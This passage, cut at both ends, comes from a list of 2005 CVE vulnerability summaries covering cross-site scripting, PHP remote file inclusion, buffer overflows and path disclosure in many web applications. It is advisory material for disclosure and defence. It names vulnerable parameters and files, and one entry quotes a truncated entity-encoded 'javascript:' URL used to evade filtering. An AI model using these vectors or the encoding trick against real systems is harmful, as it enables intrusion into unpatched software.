in install.php in mcNews 1.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the l parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2005-0720. [CVE-2005-0791] Cross-site scripting (XSS) vulnerability in adframe.php in phpAdsNew 2.0.4-pr1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the refresh parameter. [CVE-2005-0785] Cross-site scripting (XSS) vulnerability in usersrecentposts in YaBB 2.0 rc1 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2005-0784] Multiple cross-site scripting (XSS) vulnerabilities in Phorum before 5.0.15 allow remote attackers to inject arbitrary web script or HTML via (1) the subject line to follow.php or (2) the subject line in the user's personal control panel. [CVE-2005-0783] Cross-site scripting (XSS) vulnerability in Phorum before 5.0.14a allows remote attackers to inject arbitrary web script or HTML via the filename of an attached file. [CVE-2005-0782] Cross-site scripting (XSS) vulnerability in (1) viewall.php and (2) category.php for paFileDB 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the start parameter to pafiledb.php. [CVE-2005-0777] Multiple cross-site scripting (XSS) vulnerabilities in PhotoPost PHP 5.0 RC3 allow remote attackers to inject arbitrary web script or HTML via (1) the check_tags function or (2) the editbio field in the user profile. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0768] Buffer overflow in the administration web server for GoodTech Telnet Server 4.0 and 5.0, and possibly all versions before 5.0.7, allows remote attackers to execute arbitrary code via a long string to port 2380. [CVE-2005-0748] PHP remote file inclusion vulnerability in initdb.php for WEBInsta Mailing list manager 1.3d allows remote attackers to execute arbitrary PHP code by modifying the absolute_path parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0744] The web GUI for Novell iChain 2.2 and 2.3 SP2 and SP3 allows attackers to hijack sessions and gain administrator privileges by (1) sniffing the connection on TCP port 51100 and replaying the authentication information or (2) obtaining and replaying the PCZQX02 authentication cookie from the browser. [CVE-2005-0742] Cross-site scripting (XSS) vulnerability in Sun Java System Application Server 7 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-0741] Cross-site scripting (XSS) vulnerability in YaBB.pl for YaBB 2.0 RC1 allows remote attackers to inject arbitrary web script or HTML via the username parameter in a usersrecentposts action. [CVE-2005-0734] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service (memory exhaustion and process crash) via a large number of HTTP requests. [CVE-2005-0733] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to determine the existence of files via an HTTP request with a full pathname, which produces different messages whether the file exists or not. [CVE-2005-0732] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to obtain the full path of the web server via a request for a non-existent filename, which leaks the full path in an error message. [CVE-2005-0731] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service (CPU consumption) via a direct request to Filelist.html. [CVE-2005-0730] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service via a request to a file on the floppy drive, as demonstrated using A:\a.txt. [CVE-2005-0723] Cross-site scripting (XSS) vulnerability in the jumpmenu function in functions.php for paFileDB 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL parameters, which is not properly cleansed in the $pageurl variable, as demonstrated using pafiledb.php. [CVE-2005-0722] eXPerience2 allows remote attackers to obtain the full path for the web root via a direct request to modules.php without any parameters, which leaks the path in a PHP error message. [CVE-2005-0721] PHP remote file inclusion vulnerability in modules.php in eXPerience2 allows remote attackers to execute arbitrary PHP code by modifying the file parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0720] PHP remote file inclusion vulnerability in admin/header.php in PHP mcNews 1.3 allows remote attackers to execute arbitrary PHP code by modifying the skinfile parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0703] Xerox MicroServer Web Server for various WorkCentre products including M35/M45/M55 2.028.11.000 through 2.97.20.032 and 4.84.16.000 through 4.97.20.032, Pro 35/45/55 3.028.11.000 through 3.97.20.032, Pro 65/75/90 1.001.00.060 through 1.001.02.084, and others, has an "unauthenticated account," which allows remote attackers to modify system configuration, a different vulnerability than CVE-2005-1179. [CVE-2005-0698] PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the (1) G_PATH parameter to init.inc.php or the (2) PATH parameter to index.php to reference a URL on a remote web server that contains the code. [CVE-2005-0694] Hosting Controller 6.1 Hotfix 1.7 and earlier stores log files under the web root, which allows remote attackers to obtain sensitive information via a direct request to HCDiskQuotaService.csv. [CVE-2005-0692] Cross-site scripting (XSS) vulnerability in fusion_core.php for PHP-Fusion 5.x allows remote attackers to inject arbitrary web script or HTML via a message with IMG bbcode containing character-encoded Javascript. [CVE-2005-0691] PHP remote file inclusion vulnerability in article mode for modules.php in SocialMPN allows remote attackers to execute arbitrary PHP code by modifying the name parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0685] Multiple access validation errors in OutStart Participate Enterprise (PE) allow remote attackers to (1) browse arbitrary directory trees by modifying the rootFolder parameter to displaynavigator.jsp, (2) rename arbitrary directory objects by modifying the selectedObject parameter to renamepopup.jsp, (3) delete arbitrary directory objects by modifying the selectedObjectsCSV parameter to displaydeletenavigator.jsp, and conduct other unauthorized activities via the (4) showDeleteView, (5) showWebFolderView, (6) showLibraryView, (7) showMyLibraryView, (8) singleSelectObject, (9) processRadioSelection, (10) processCheckboxSelection, (11) singleSelectObject, (12) addToSelectedObjects, or (13) removeFromSelectedObjects commands. [CVE-2005-0684] Multiple buffer overflows in the web tool for MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long file parameter after a percent ("%") sign or (2) a long Lock-Token string to the WebDAV functionality, which is not properly handled by the getLockTokenHeader function in WDVHandler_CommonUtils.c. [CVE-2005-0682] Cross-site scripting (XSS) vulnerability in common.inc in Drupal before 4.5.2 allows remote attackers to inject arbitrary web script or HTML via certain inputs. [CVE-2005-0680] PHP remote file inclusion vulnerability in download_center_lite.inc.php for Download Center Lite 1.6 allows remote attackers to execute arbitrary PHP code by modifying the script_root parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0679] PHP remote file inclusion vulnerability in tell_a_friend.inc.php for Tell A Friend Script 2.7 before 20050305 allows remote attackers to execute arbitrary PHP code by modifying the script_root parameter to reference a URL on a remote web server that contains the code. NOTE: it was later reported that 2.4 is also affected. [CVE-2005-0678] PHP remote file inclusion vulnerability in formmail.inc.php for Form Mail Script 2.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the script_root to reference a URL on a remote web server that contains the code. [CVE-2005-0675] Cross-site scripting (XSS) vulnerability in index.php for Zorum 3.5 allows remote attackers to inject arbitrary web script or HTML via the (1) list or (2) frommethod parameters. [CVE-2005-0674] Cross-site scripting (XSS) vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request. [CVE-2005-0673] Cross-site scripting (XSS) vulnerability in usercp_register.php for phpBB 2.0.13 allows remote attackers to inject arbitrary web script or HTML by setting the (1) allowhtml, (2) allowbbcode, or (3) allowsmilies parameters to inject HTML into signatures for personal messages, possibly when they are processed by privmsg.php or viewtopic.php. [CVE-2005-0670] Cross-site scripting (XSS) vulnerability in phpCOIN 1.2.0 through 1.2.1b allows remote attackers to inject arbitrary web script or HTML via (1) the new parameter to mod.php, (2) the w parameter to mod.php, (3) the e parameter to login.php, (4) the o parameter to login.php, and possibly other scripts. [CVE-2005-0662] Cross-site scripting (XSS) vulnerability in index.php for MercuryBoard 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the Avatar field. [CVE-2005-0660] Multiple cross-site scripting (XSS) vulnerabilities in D-Forum 1.11 allows remote attackers to inject arbitrary web script or HTML via certain fields, as demonstrated using the page parameter in nav.php3. [CVE-2005-0656] Multiple cross-site scripting (XSS) vulnerabilities in auraCMS 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) hits parameter to hits.php, (2) query parameter to index.php, or (3) theCount parameter to counter.php. [CVE-2005-0650] Multiple cross-site scripting (XSS) vulnerabilities in ProjectBB 0.4.5.1 allow remote attackers to inject arbitrary web script or HTML via (1) the pages parameter to divers.php (incorrectly referred to as "drivers.php" by some sources), (2) in the search feature text area, (3) forum name, (4) site name or (5) the maximum avatar size in the option section, (5) new category or (6) new forum fields in the forum section. [CVE-2005-0645] Cross-site scripting (XSS) vulnerability in show.inc.php in cuteNews 1.3.6 allows remote attackers to inject arbitrary HTML, web script, and PHP code via the (1) CLIENT-IP or (2) X-FORWARDED-FOR header in an HTTP POST request to show_news.php. [CVE-2005-0641] Cross-site scripting (XSS) vulnerability in the Reporter for Computer Associates (CA) Unicenter Asset Management (UAM) 4.0 allows remote attackers to inject arbitrary HTML or web script via the (1) name or (2) description in a report template. [CVE-2005-0629] Multiple cross-site scripting (XSS) vulnerabilities in profile.php in 427BB 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) Avatar parameters. [CVE-2005-0628] Multiple cross-site scripting (XSS) vulnerabilities in Forumwa 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter in search.php or the (2) body or (3) subject of a forum message. [CVE-2005-0616] Multiple cross-site scripting (XSS) vulnerabilities in the Download module for PostNuke 0.750 and 0.760-RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) Program name, (2) File link, (3) Author name (4) Author e-mail address, (5) File size, (6) Version, or (7) Home page variables. [CVE-2005-0608] Heap-based buffer overflow in server.cpp for WebMod 0.47 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a POST request with a Content-Length that is less than the amount of data that is actually sent. [CVE-2005-0606] Cross-site scripting (XSS) vulnerability in settings.inc.php for CubeCart 2.0.0 through 2.0.5, as used in multiple PHP files, allows remote attackers to inject arbitrary HTML or web script via the (1) cat_id, (2) PHPSESSID, (3) view_doc, (4) product, (5) session, (6) catname, (7) search, or (8) page parameters. [CVE-2005-0593] Firefox before 1.0.1 and Mozilla before 1.7.6 allows remote attackers to spoof the SSL "secure site" lock icon via (1) a web site that does not finish loading, which shows the lock of the previous site, (2) a non-HTTP server that uses SSL, which causes the lock to be displayed when the SSL handshake is completed, or (3) a URL that generates an HTTP 204 error, which updates the icon and location information but does not change the display of the original site. [CVE-2005-0587] Firefox before 1.0.1 and Mozilla before 1.7.6 allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file. [CVE-2005-0586] Firefox before 1.0.1 and Mozilla before 1.7.6 allows remote malicious web sites to spoof the extensions of files to download via the Content-Disposition header, which could be used to trick users into downloading dangerous content. [CVE-2005-0585] Firefox before 1.0.1 and Mozilla before 1.7.6 truncates long sub-domains or paths for display, which may allow remote malicious web sites to spoof legitimate sites and facilitate phishing attacks. [CVE-2005-0574] Directory traversal vulnerability in CIS WebServer 3.5.13 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the URL. [CVE-2005-0572] index.php in phpWebSite 0.10.0 and earlier allows remote attackers to obtain sensitive information via an invalid SEA_search_module parameter, which reveals the path in a PHP error message. [CVE-2005-0565] The Announce module in phpWebSite 0.10.0 and earlier allows remote attackers to execute arbitrary PHP code by setting the Image field to reference a PHP file whose name contains a .gif.php extension. [CVE-2005-0563] Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("jav&#X41sc&#0010 [CVE-2005-0553] Race condition in the memory management routines in the DHTML object processor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail, aka "DHTML Object Memory Corruption Vulnerability". [CVE-2005-0549] Cross-site scripting (XSS) vulnerability in Solaris AnswerBook2 Documentation 1.4.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the "View Log Files" function. [CVE-2005-0548] Cross-site scripting (XSS) vulnerability in Solaris AnswerBook2 Documentation 1.4.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the Search function. [CVE-2005-0543] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.6.1 allows remote attackers to inject arbitrary HTML and web script via (1) the strServer, cfg[BgcolorOne], or strServerChoice parameters in select_server.lib.php, (2) the bg_color or row_no parameters in display_tbl_links.lib.php, the left_font_family parameter in theme_left.css.php, or the right_font_family parameter in theme_right.css.php. [CVE-2005-0538] Directory traversal vulnerability in (1) GinpPictureServlet.java and (2) PicCollection.java in ginp (Java Photo Gallery Web Application) before 0.22 allows remote attackers to read arbitrary files. [CVE-2005-0534] Multiple cross-site scripting (XSS) vulnerabilities in MediaWiki 1.3.x before 1.3.11 and 1.4 beta before 1.4 rc1 allow remote attackers to inject arbitrary web script. [CVE-2005-0526] Multiple cross-site scripting (XSS) vulnerabilities in PBLang 4.65 allow remote attackers to inject arbitrary web script or HTML via (1) the search string to search.php, (2) the subject of a PM, which is processed by pm.php, or (3) the body of a PM, which is processed by pmpshow.php. [CVE-2005-0514] Cross-site scripting (XSS) vulnerability in Verity Ultraseek before 5.3.3 allows remote attackers to inject arbitrary HTML and web script via search parameters. [CVE-2005-0513] PHP remote file inclusion vulnerability in mail_autocheck.php in the Email This Entry add-on for pMachine Pro 2.4, and possibly other versions including pMachine Free, allows remote attackers to execute arbitrary PHP code by directly requesting mail_autocheck.php and modifying the pm_path parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2003-1086. [CVE-2005-0512] PHP remote file inclusion vulnerability in Tar.php in Mambo 4.5.2 allows remote attackers to execute arbitrary PHP code by modifying the mosConfig_absolute_path parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2004-1693. [CVE-2005-0509] Multiple cross-site scripting (XSS) vulnerabilities in the Mono 1.0.5 implementation of ASP.NET (.Net) allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<". [CVE-2005-0495] Cross-site scripting (XSS) vulnerability in ZeroBoard allows remote attackers to inject arbitrary web script or HTML via the (1) sn1, (2) year, or (3) page parameter to zboard.php or (4) filename to view_image.php. [CVE-2005-0490] Multiple stack-based buffer overflows in libcURL and cURL 7.12.1, and possibly other versions, allow remote malicious web servers to execute arbitrary code via base64 encoded replies that exceed the intended buffer lengths when decoded, which is not properly handled by (1) the Curl_input_ntlm function in http_ntlm.c during NTLM authentication or (2) the Curl_krb_kauth and krb4_auth functions in krb4.c during Kerberos authentication. [CVE-2005-0487] Cross-site scripting (XSS) vulnerability in index.php for Kayako ESupport 2.3.1, and possibly other versions, allows remote attackers to inject arbitrary HTML and web script via the nav parameter. [CVE-2005-0485] Cross-site scripting (XSS) vulnerability in comment.php for paNews 2.0b4 for PHP Arena allows remote attackers to inject arbitrary HTML and web script via the showpost parameter. [CVE-2005-0480] Cross-site scripting (XSS) vulnerability in TrackerCam 5.12 and earlier allows remote attackers to inject arbitrary HTML or web script via the login request, which is recorded in a log file but not properly handled when the administrator views the log file. [CVE-2005-0477] Cross-site scripting (XSS) vulnerability in the SML code for Invision Power Board 1.3.1 FINAL allows remote attackers to inject arbitrary web script via (1) a signature file or (2) a message post containing an IMG tag within a COLOR tag whose style is set to background:url. [CVE-2005-0476] Cross-site scripting (XSS) vulnerability in hpm_guestbook.cgi allows remote attackers to inject arbitrary web script or HTML by posting a message. [CVE-2005-0474] SQL injection vulnerability in the user_valid_crypt function in user.php in WebCalendar 0.9.45 allows remote attackers to execute arbitrary SQL commands via an encoded webcalendar_session cookie. [CVE-2005-0467] Multiple integer overflows in the (1) sftp_pkt_getstring and (2) fxp_readdir_recv functions in the PSFTP and PSCP clients for PuTTY 0.56, and possibly earlier versions, allow remote malicious web sites to execute arbitrary code via SFTP responses that corrupt the heap after insufficient memory has been allocated. [CVE-2005-0462] Cross-site scripting (XSS) vulnerability in MercuryBoard 1.0.x and 1.1.x allows remote attackers to inject arbitrary HTML and web script via the f parameter. [CVE-2005-0459] phpMyAdmin 2.6.2-dev, and possibly earlier versions, allows remote attackers to determine the full path of the web root via a direct request to select_lang.lib.php, which reveals the path in a PHP error message. [CVE-2005-0458] Cross-site scripting (XSS) vulnerability in contact_us.php in osCommerce 2.2-MS2 allows remote attackers to inject arbitrary web script or HTML via the enquiry parameter. [CVE-2005-0452] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft ASP.NET (.Net) 1.0 and 1.1 to SP1 allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<". [CVE-2005-0445] Cross-site scripting (XSS) vulnerability in Open WebMail 2.x allows remote attackers to inject arbitrary HTML or web script via the domain name parameter (logindomain) in the login page. [CVE-2005-0443] index.php in CubeCart 2.0.4 allows remote attackers to (1) obtain the full path for the web server or (2) conduct cross-site scripting (XSS) attacks via an invalid language parameter, which echoes the parameter in a PHP error message. [CVE-2005-0435] awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to read server web logs by setting the loadplugin and pluginmode parameters to rawlog. [CVE-2005-0434] Multiple cross-site scripting (XSS) vulnerabilities in Php-Nuke 7.5 allow remote attackers to inject arbitrary HTML or web script via (1) the newdownloadshowdays parameter in a NewDownloads operation or (2) the newlinkshowdays parameter in a NewLinks operation. [CVE-2005-0433] Php-Nuke 7.5 allows remote attackers to determine the full path of the web server via invalid or missing arguments to (1) db.php, (2) mainfile.php, (3) Downloads/index.php, or (4) Web_Links/index.php, which lists the path in a PHP error message. [CVE-2005-0432] BEA WebLogic Server 7.0 Service Pack 5 and earlier, and 8.1 Service Pack 3 and earlier, generates different login exceptions that suggest why an authentication attempt fails, which makes it easier for remote attackers to guess passwords via brute force attacks. [CVE-2005-0427] The ebuild of Webmin before 1.170-r3 on Gentoo Linux includes the encrypted root password in the miniserv.users file when building a tbz2 of the webmin package, which allows remote attackers to obtain and possibly crack the encrypted password. [CVE-2005-0425] Unknown vulnerability in IBM Websphere Application Server 5.0, 5.1, and 6.0 when running on Windows, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via a crafted URL that causes the page to be processed by the file serving servlet instead of the JSP engine. [CVE-2005-0420] Microsoft Outlook Web Access (OWA), when used with Exchange, allows remote attackers to redirect users to arbitrary URLs for login via a link to the owalogon.asp application. [CVE-2005-0418] Argument injection vulnerability in Java Web Start for J2SE 1.4.2 up to 1.4.2_06, on Mac OS X, allows untrusted applications to gain privileges via the value parameter of a property tag in a JNLP file. NOTE: it is highly likely that this item will be MERGED with CVE-2005-0836. [CVE-2005-0412] Cross-site scripting (XSS) vulnerability in Spidean PostWrap allows remote attackers to inject arbitrary HTML and web script via the page parameter. [CVE-2005-0407] Cross-site scripting (XSS) vulnerability in Openconf 1.04, and possibly other versions before 1.10, allows remote attackers to inject arbitrary HTML and web script via the paper title. [CVE-2005-0397] Format string vulnerability in the SetImageInfo function in image.c for ImageMagick before 6.0.2.5 may allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in a filename argument to convert, which may be called by other web applications. [CVE-2005-0391] geneweb 4.10 and earlier does not properly check file permissions and content during conversion, which allows attackers to modify arbitrary files. [CVE-2005-0386] Cross-site scripting (XSS) vulnerability in network.cgi in mailreader before 2.3.29 earlier allows remote attackers to inject arbitrary web script or HTML via MIME text/enriched or text/richtext messages. [CVE-2005-0381] Cross-site scripting (XSS) vulnerability in f.aspx in forumKIT 1.0 allows remote attackers to inject arbitrary web script or HTML via the members parameter. [CVE-2005-0380] Multiple PHP remote file inclusion vulnerabilities in (1) print_category.php, (2) login.php, (3) setup.php, (4) ask_password.php, or (5) error.php in ZeroBoard 4.1pl5 and earlier allow remote attackers to execute arbitrary PHP code by modifying the dir parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0378] Multiple cross-site scripting (XSS) vulnerabilities in Horde 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter to prefs.php or (2) url parameter to index.php. [CVE-2005-0376] PHP remote file inclusion vulnerability in SGallery 1.01 allows local and possibly remote attackers to execute arbitrary PHP code by modifying the DOCUMENT_ROOT parameter to reference a URL on a remote web server that contains (1) config.php or (2) sql_layer.php. [CVE-2005-0374] Cross-site scripting (XSS) vulnerability in Bitboard 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via an [img] bbcode image tag with an event such as mouseover. [CVE-2005-0341] Apple Safari 1.2.4 does not obey the Content-type field in the HTTP header and renders text as HTML, which allows remote attackers to inject arbitrary web script or HTML and perform cross-site scripting (XSS) attacks. [CVE-2005-0338] Buffer overflow in Savant Web Server 3.1 allows remote attackers to execute arbitrary code via a long HTTP request. [CVE-2005-0336] Cross-site scripting (XSS) vulnerability in EMotion MediaPartner Web Server 5.0 allows remote attackers to inject arbitrary HTML or web script, as demonstrated using a URL containing .. sequences and HTML, which results in a directory browsing page that does not properly filter the HTML. [CVE-2005-0335] Directory traversal vulnerability in EMotion MediaPartner Web Server 5.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2005-0328] Zyxel P310, P314, P324 and Netgear RT311, RT314 running the latest firmware, allows remote attackers on the WAN to obtain the IP address of the LAN side interface by pinging a valid LAN IP address, which generates an ARP reply from the WAN address side that maps the LAN IP address to the WAN's MAC address. [CVE-2005-0324] Infinite Mobile Delivery Webmail 2.6 allows remote attackers to gain sensitive information via an HTTP request that contains invalid characters for a Windows foldername, which reveals the path in an error message. [CVE-2005-0323] Cross-site scripting (XSS) vulnerability in Infinite Mobile Delivery Webmail 2.6 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2005-0322] MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0 and Mail Server 7.6.4r with Icewarp Mail Server 5.3.2 uses weak encryption in the (1) users.cfg, (2) settings.cfg, (3) users.dat or (4) user.dat files, which allows local users to extract the passwords. [CVE-2005-0321] MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0 allows remote authenticated users to gain sensitive information via an HTTP request to (1) calendar_d.html, (2) calendar_m.html, (3) calendar_w.html, or (4) calendar_y.html, which reveal the installation path. [CVE-2005-0320] Multiple cross-site scripting vulnerabilities in MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to login.html, (2) accountid parameter to accountsettings_add.html, or the (3) note, (4) title, and (5) location fields to calendar.html. [CVE-2005-0319] Direct remote injection vulnerability in modalfram.wdm in Alt-N WebAdmin 3.0.4 allows remote attackers to load external webpages that appear to come from the WebAdmin server, which allows remote attackers to inject arbitrary HTML or web script to facilitate cross-site scripting (XSS) and phishing attacks. [CVE-2005-0318] useredit_account.wdm in Alt-N WebAdmin 3.0.4 does not properly validate account edits by the logged in user, which allows remote authenticated users to edit other users' account information via a modified user parameter. [CVE-2005-0317] Cross-site scripting (XSS) vulnerability in useredit_account.wdm in Alt-N WebAdmin 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2005-0316] WebWasher Classic 2.2.1 and 3.3, when running in server mode, does not properly drop CONNECT requests to the localhost from external systems, which could allow remote attackers to bypass intended access restrictions. [CVE-2005-0314] Cross-site scripting (XSS) vulnerability in user.php in Magic Winmail Server 4.0 Build 1112 allows remote attackers to inject arbitrary web script or HTML via the personal information fields. [CVE-2005-0309] Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php or (2) mod.php in Exponent 0.95 allow remote attackers to inject arbitrary web script or HTML via the module parameter. [CVE-2005-0307] Multiple cross-site scripting (XSS) vulnerabilities in index.php in MercuryBoard 1.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) s, (2) l, (3) a, (4) t, (5) to, or (6) re parameters. [CVE-2005-0303] Multiple cross-site scripting (XSS) vulnerabilities in (1) comersus_supportError.asp or (2) comersus_backofficelite_supportError.asp in BackOffice Lite 6.0 and 6.01 allow remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2005-0296] DISPUTED NOTE: this issue has been disputed by the vendor. The error module in Novell GroupWise WebAccess allows remote attackers who have not authenticated to read potentially sensitive information, such as the version, via an incorrect login and a modified (1) error or (2) modify parameter that returns template files or the "about" information page. NOTE: the vendor has disputed this issue. [CVE-2005-0294] minis.php in Minis 0.2.1 allows remote attackers to cause a denial of service (infinite loop) via an HTTP request for a file that the web server does not have permission to read, as demonstrated using the month parameter. [CVE-2005-0291] Cross-site scripting (XSS) vulnerability in the log viewer in NETGEAR FVS318 running firmware 2.4, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via a blocked URL phrase. [CVE-2005-0288] The change password functionality in Bottomline Webseries Payment Application does not require the old password when users enter a new password, which could allow remote authenticated users to change other users' passwords. [CVE-2005-0287] Bottomline Webseries Payment Application allows remote attackers to read arbitrary files on the network via a report template with modified ReportPath or ReportName values. [CVE-2005-0286] eMotion MediaPartner Web Server 5.0 and 5.1 allows remote attackers to obtain sensitive information via an HTTP request for a .bhtml file that contains a (1) . (dot) or (2) + (plus sign) at the end, which returns the source code for that file. [CVE-2005-0285] Webseries Payment Application does not properly restrict privileged operations, which allows remote authenticated users to gain privileges by directly accessing certain URLs. [CVE-2005-0274] Multiple cross-site scripting (XSS) vulnerabilities in showgallery.php in PhotoPost before 4.86 allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) si, (3) page, or (4) ppuser parameters. [CVE-2005-0270] Multiple cross-site scripting (XSS) vulnerabilities in ReviewPost PHP Pro before 2.84 allow remote attackers to inject arbitrary web script or HTML via the (1) si parameter to showcat.php, (2) cat or (3) page parameter to showproduct.php, or (4) report parameter to reportproduct.php. [CVE-2005-0266] Cross-site scripting (XSS) vulnerability in index.php in SugarCRM 1.X allows remote attackers to inject arbitrary web script or HTML via the (1) return_module, (2) return_action, (3) name, (4) module, or (5) record parameter. [CVE-2005-0264] Multiple cross-site scripting (XSS) vulnerabilities in browse.php in OWL 0.7 and 0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) expand or (2) order parameter. [CVE-2005-0251] Cross-site scripting (XSS) vulnerability in bibindex.php for BibORB 1.3.2, and possibly earlier versions, allows remote attackers to inject arbitrary HTML and web script via the search parameter. [CVE-2005-0236] The International Domain Name (IDN) support in Omniweb 5 allows remote attackers to spoof domain names using punycode encoded domain names that are decoded in URLs and SSL certificates in a way that uses homograph characters from other character sets, which facilitates phishing attacks. [CVE-2005-0229] CitrusDB 0.3.5 and earlier stores the newfile.txt temporary data file under the web root, which allows remote attackers to steal credit card information via a direct request to newfile.txt. [CVE-2005-0221] Cross-site scripting (XSS) vulnerability in login.php in Gallery 2.0 Alpha allows remote attackers to inject arbitrary web script or HTML via the g2_form[subject] field. [CVE-2005-0220] Cross-site scripting vulnerability in login.php in Gallery 1.4.4-pl2 allows remote attackers to inject arbitrary web script or HTML via the username field. [CVE-2005-0219] Multiple cross-site scripting (XSS) vulnerabilities in Gallery 1.3.4-pl1 allow remote attackers to inject arbitrary web script or HTML via (1) the index field in add_comment.php, (2) set_albumName, (3) slide_index, (4) slide_full, (5) slide_loop, (6) slide_pause, (7) slide_dir fields in slideshow_low.php, or (8) username field in search.php. [CVE-2005-0216] Cross-site scripting (XSS) vulnerability in formmail.php in Woltlab Burning Board Lite 1.0.0, 1.0.1e, and possibly other versions, allows remote attackers to inject arbitrary web sript and HTML via the userid parameter. [CVE-2005-0197] Cisco IOS 12.1T, 12.2, 12.2T, 12.3 and 12.3T, with Multi Protocol Label Switching (MPLS) installed but disabled, allows remote attackers to cause a denial of service (device reload) via a crafted packet sent to the disabled interface. [CVE-2005-0158] Format string vulnerability in bidwatcher before 1.3.17 allows remote malicious web servers from eBay, or a spoofed eBay server, to cause a denial of service and possibly execute arbitrary code via certain responses. [CVE-2005-0142] Firefox 0.9, Thunderbird 0.6 and other versions before 0.9, and Mozilla 1.7 before 1.7.5 save temporary files with world-readable permissions, which allows local users to read certain web content or attachments that belong to other users, e.g. content that is managed by helper applications such as PDF. [CVE-2005-0111] Stack-based buffer overflow in the websql CGI program in MySQL MaxDB 7.5.00 allows remote attackers to execute arbitrary code via a long password parameter. [CVE-2005-0110] Internet Explorer 6 on Windows XP SP2 allows remote attackers to bypass the file download warning dialog and possibly trick an unknowledgeable user into executing arbitrary code via a web page with a body element containing an onclick tag, as demonstrated using the createElement function. [CVE-2005-0104] Cross-site scripting (XSS) vulnerability in webmail.php in SquirrelMail before 1.4.4 allows remote attackers to inject arbitrary web script or HTML via certain integer variables. [CVE-2005-0103] PHP remote file inclusion vulnerability in webmail.php in SquirrelMail before 1.4.4 allows remote attackers to execute arbitrary PHP code by modifying a URL parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0085] Cross-site scripting (XSS) vulnerability in ht://dig (htdig) before 3.1.6-r7 allows remote attackers to execute arbitrary web script or HTML via the config parameter, which is not properly sanitized before it is displayed in an error message. [CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference. [CVE-2005-0082] The sapdbwa_GetUserData function in MySQL MaxDB 7.5.0.0, and other versions before 7.5.0.21, allows remote attackers to cause a denial of service (crash) via invalid parameters to the WebDAV handler code, which triggers a null dereference that causes the SAP DB Web Agent to crash. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers 